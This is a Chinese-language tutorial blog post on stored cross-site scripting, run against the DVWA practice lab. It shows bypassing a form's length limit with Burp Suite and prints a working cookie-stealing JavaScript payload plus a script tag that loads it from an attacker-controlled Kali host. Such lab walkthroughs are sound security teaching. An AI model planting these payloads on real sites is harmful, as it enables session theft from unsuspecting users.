二十五、XSS跨站攻击-(4)存储型xss
2017-12-15 本文已影响0人
cybeyond
目录
1.特点
2.存储型xss盗取cookie
1、特点
- 长期存储于服务端
- 每次用户访问都会执行javascript脚本,而反射型需要通过诱使用户去点击
在存储性跨站中,留言板Message里面输入一段js,然后点击提交,以后访问此页面的每个用户都会出现此弹出页。
![](https://img.haomeiwen.com/i4593121/1bcc649df4333137.png)
![](https://img.haomeiwen.com/i4593121/8efc4f8a1ed80bf4.png)
由于在网页Name中有字数限制,即存在Name客户端表单长度限制,因此没法直接输入js,可以通过burpsuite输入(防范的方法是不仅在客户端限制,也要在服务端限制)
![](https://img.haomeiwen.com/i4593121/b0bbfa923407398f.png)
点击go后,查看reponse报文,并通过“show reponse in browser”查看是否弹出xssed
![](https://img.haomeiwen.com/i4593121/b545b7338b473277.png)
![](https://img.haomeiwen.com/i4593121/50217559712bf907.png)
![](https://img.haomeiwen.com/i4593121/75f9d6983b03bf00.png)
2、存储型xss盗取cookie
首先在kali上写一段js脚本b.js,j将其放于/var/www/html/目录下,用于用户访问时能够被调用执行
var img = new Image();
img.src = "http://192.168.50.115:88/cookies.php?cookie="+document.cookie;
随后在kali上开启apache
#service apache2 start
测试能否访问到b.js
![](https://img.haomeiwen.com/i4593121/d587ab666ef0d10a.png)
然后在kali上开启监听88端口
![](https://img.haomeiwen.com/i4593121/fc2a9c93a49472f4.png)
由于上面描述的,在dvwa的stored xss的name输入有长度限制,可以通过burpsuite,也可以通过html直接修改
![](https://img.haomeiwen.com/i4593121/3f059886faa0a103.png)
![](https://img.haomeiwen.com/i4593121/90c369485de34d90.png)
最后向其输入js代码
<script src=http://192.168.50.115/b.js></script>
![](https://img.haomeiwen.com/i4593121/e2b7822582580076.png)
点击提交,此时查看效果,js已经保存在服务端,其他用户点击就会将cookie发送到kali上
![](https://img.haomeiwen.com/i4593121/fea6dd940e95f04d.png)
从宿主机上,当点击此页面的时候,重新启动监听后,能够得到其他用户的cookie
![](https://img.haomeiwen.com/i4593121/f220a6e703301b98.png)